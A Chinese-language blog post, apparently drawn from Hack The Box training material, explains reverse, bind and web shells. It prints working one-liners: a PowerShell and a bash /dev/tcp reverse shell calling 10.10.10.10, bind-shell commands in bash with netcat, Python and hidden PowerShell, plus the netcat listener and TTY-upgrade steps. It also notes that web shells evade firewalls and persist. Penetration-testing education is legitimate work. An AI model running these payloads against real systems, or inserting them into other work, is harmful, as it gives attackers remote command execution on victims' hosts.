HgTrojan blogshell
什么是shell?
访问受感染主机以进行控制和远程代码执行的一种方法是通过 shell。
简单来说就是一种代码执行壳,cmd窗口就是一种shell。
Shell 的类型
Shell 主要有三种类型:Reverse Shell、Bind Shell 和 Web Shell。这些 shell 中的每一个都有不同的通信方法与我们通信,用于接受和执行我们的命令。
| 外壳类型 | 沟通方式 |
|---|---|
Reverse Shell | 连接回我们的系统,并通过反向连接给予我们控制权。 |
Bind Shell | 等待我们连接到它,并在我们连接到它后给予我们控制权。 |
Web Shell | 通过 Web 服务器进行通信,通过 HTTP 参数接受我们的命令,执行它们,并打印回输出。 |
反 Shell
Reverse shell 是最常见的 shell 类型,因为它是控制受感染主机的最快、最简单的方法。
正常shell是我们连接到对方,反shell则是对方连接到我们的侦听器。
具体讲就是,一旦我们在远程主机上发现允许远程代码执行的漏洞,我们就可以在我们的机器上启动一个侦听器,该侦听器侦听特定端口,比如 54321端口.有了这个侦听器,我们就可以执行一个连接远程系统 shell,即连接到我们的54321端口,这个时候侦听器,就可以为我们提供了远程系统上的反向连接。
说到Reverse shell就不得不提侦听器了,那么我们如何创建一个侦听器呢?
我们可以利用Necat,具体代码如下:
HgTrojan@htb[/htb]$ nc -lvnp 54321| 参数 | 描述 |
|---|---|
-l | 侦听模式,等待连接连接到我们。 |
-v | 详细模式,以便我们知道何时收到连接。 |
-n | 禁用DNS解析,仅从/连接到IP,以加快连接速度。 |
-p 54321 | 端口号 54321 正在侦听,应将反向连接发送到。netcat |
现在我们就有一个正在等待连接的侦听器。
那如何让被感染者连接到我们呢?
不同系统语句不同这里举俩个例子:
Windows
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',54321);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"Linux
bash -c 'bash -i >& /dev/tcp/10.10.10.10/54321 0>&1'Bind Shell
这个shell和反shell让对方连接到我们不同,我们必须在侦听端口上连接到它,所以他叫绑定shell。
一旦我们执行Bind Shell ,对方的侦听器将开始侦听主机上的端口,并将该主机的 shell 绑定到该端口。我们连接到该端口,并通过该系统上的 shell 进行控制。
绑定 shell 命令
我们可以利用 Payload All The Things 找到一个合适的命令来启动我们的绑定 shell。
注意:我们将在远程主机上的端口“1234”上启动侦听连接,IP 为“0.0.0.0”,以便我们可以从任何地方连接到它。
以下是可用于启动绑定 shell 的可靠命令:
代码:bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f代码:python
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'代码:powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();Bind Shell 连接
HgTrojan@htb[/htb]$ nc ip 端口升级 TTY
一旦我们通过 Netcat 连接到 shell,我们会注意到我们只能键入命令或退格键,但我们不能向左或向右移动文本光标来编辑我们的命令,也不能上下访问命令历史记录。为了能够做到这一点,我们需要升级我们的 TTY。这可以通过将我们的终端 TTY 与远程 TTY 映射来实现。
有多种方法可以做到这一点。出于我们的目的,我们将使用该方法。在我们的 shell 中,我们将使用以下命令使用 python 将 shell 的类型升级到完整的 TTY:
HgTrojan@htb[/htb]$ python -c 'import pty; pty.spawn("/bin/bash")'运行此命令后,我们将点击后台 shell 并返回本地终端,然后输入以下命令:ctrl+z
www-data@remotehost$ ^Z
HgTrojan@htb[/htb]$ stty raw -echo
HgTrojan@htb[/htb]$ fg
[Enter]
[Enter]
www-data@remotehost$一旦我们击中,它会将我们的外壳带回前景。此时,终端将显示一个空行。我们可以再次点击以返回我们的 shell 或输入并按回车键将其恢复。在这一点上,我们将拥有一个完全工作的 TTY shell,其中包含命令历史记录和其他所有内容。
可能会注意到,我们的外壳并没有覆盖整个终端。为了解决这个问题,我们需要找出一些变量。我们可以在系统上打开另一个终端窗口,最大化窗口或使用我们想要的任何大小,然后输入以下命令来获取我们的变量:
HgTrojan@htb[/htb]$ echo $TERM
xterm-256colorHgTrojan@htb[/htb]$ stty size
67 318第一个命令向我们展示了变量,第二个命令分别向我们展示了 字体 和 字号 的值。现在我们有了变量,我们可以回到我们的 shell 并使用以下命令来更正它们:
www-data@remotehost$ export TERM=xterm-256color
www-data@remotehost$ stty rows 67 columns 318完成此操作后,我们应该拥有一个使用终端全部功能的 shell,就像 SSH 连接一样。
Web shell
通常是一个 Web 脚本,它通过 HTTP 请求参数接受我们的命令,执行我们的命令,并将其输出打印回网页上。
我们通常需要运用到中华蚁剑,中华菜刀等工具进行连接。
Web Shell 的一大好处是它可以绕过任何现有的防火墙限制,即使对方重启我们的web shell 依然存在。
打赏: 
支付宝
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
评论已关闭